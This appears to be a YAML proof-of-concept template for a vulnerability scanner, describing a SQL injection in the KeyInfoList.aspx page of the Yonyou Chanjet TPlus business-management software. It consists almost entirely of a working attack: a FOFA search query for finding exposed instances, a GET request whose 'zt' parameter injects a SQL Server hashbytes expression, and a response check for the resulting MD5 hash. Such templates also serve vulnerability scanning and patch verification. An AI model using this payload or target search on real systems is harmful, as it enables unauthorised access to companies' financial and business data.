product: 用友畅捷通-TPlus
vName: 用友畅捷通-TPlus KeyInfoList.aspx SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 畅用友畅捷通-TPlus专属云适用于需要一体化管理的企业，财务管理、业务管理、零售管理、生产管理、物流管理、移动仓管、营销管理、委外加工等人财货客一体化管理。用友畅捷通-TPlus KeyInfoList.aspx存在SQL注入漏洞。
version: ''
note: ''
search:
  FOFA: app="畅捷通-TPlus" && product="畅捷通-TPlus"
protocol: http
link: https://blog.csdn.net/qq_41904294/article/details/137428777
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+sys.fn_varbintohexstr(hashbytes('MD5','123456'))--+
    verify:
      path: ''
      logic: and
      check:
        - body:
            value:
              - e10adc3949ba59abbe56e057f20f883e
            logic: and